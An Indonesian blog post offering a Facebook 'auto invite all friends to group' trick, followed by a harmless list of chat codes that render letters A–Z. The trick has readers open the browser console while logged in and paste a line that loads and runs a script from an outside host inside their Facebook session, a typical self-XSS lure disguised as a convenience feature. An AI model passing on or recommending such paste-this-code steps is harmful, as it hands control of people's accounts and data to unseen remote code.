Auto Invite All Friend To Group Facebook

Buat grup Facebook mu jadi banyak anggota nya, tak perlu klik undang 1 per 1… cuma skali pencet, otomatis teman facebookmu sudah menjadi anggota di grup yg kamu kelola.. Silahkan simak tutorial dibawah smile New Auto Invite All Friend To Group Facebook Menggunakan Mozilla Firefox:

1. Buka browser mozilla

2. Lalu login Facebook sobat

3. Masuk ke group yang udah sobat buat

4. Lalu tekan CTRL + SHIFT + K Pada keyboard sobat

5. Lalu Copy & Paste code dibawah document.body.appendChild(document.createElement(‘script’)).src=’http://auto-inpet.googlecode.com/files/f4ceb00xx.js’;

6. Lalu Tekan Enter

7. Tunggu sampai prosesnya selesai.

jika ingin liat contoh hasil, liat pada gambar .. 

ingat jngan salah gunakan trik ini.. 

sekian dari saya & Terimakasih….  jngan lupa tinggalkan KOMENTAR okey 🙂

Kode alfabet Di Facebook

Assalamuallaikum.wr.wb Pda kesempatan kali ini gua Mw Berbagi tentang   [[DIBAWAH INI ADALAH KODE HURUF/­ALPHABETH]] tinggal copy paste aja ke chatbox Facebook.

[[2449618589092­98]] = huruf A

[[3441136522701­50]] = B

[[3449912788476­13]] = C

[[1644614936536­96]] = D

[[1967524237512­20]] = E

[[3016305732154­30]] = F

[[2514961182504­64]] = G

[[2663942200866­54]] = H

[[1648665569481­32]] = I

[[1805993353719­68]] = J

[[2090670058436­51]] = K

[[2385940395453­96]] = L

[[1477022853385­28]] = M

[[3092214024520­22]] = N

[[1809014053407­14]] = O

[[2465069254165­51]] = P

[[3333436133440­59]] = Q

[[1231283678035­69]] = R

[[3161433884160­19]] = S

[[3340734566056­73]] = T

[[1996260934606­43]] = U

[[2242026143232­63]] = V

[[3360324597407­92]] = W

[[2052282262327­32]] = X

[[1424203992022­82]] = Y

[[1579198176452­24]] = Z

 

sekian dari saya,,, semoga bermanfaat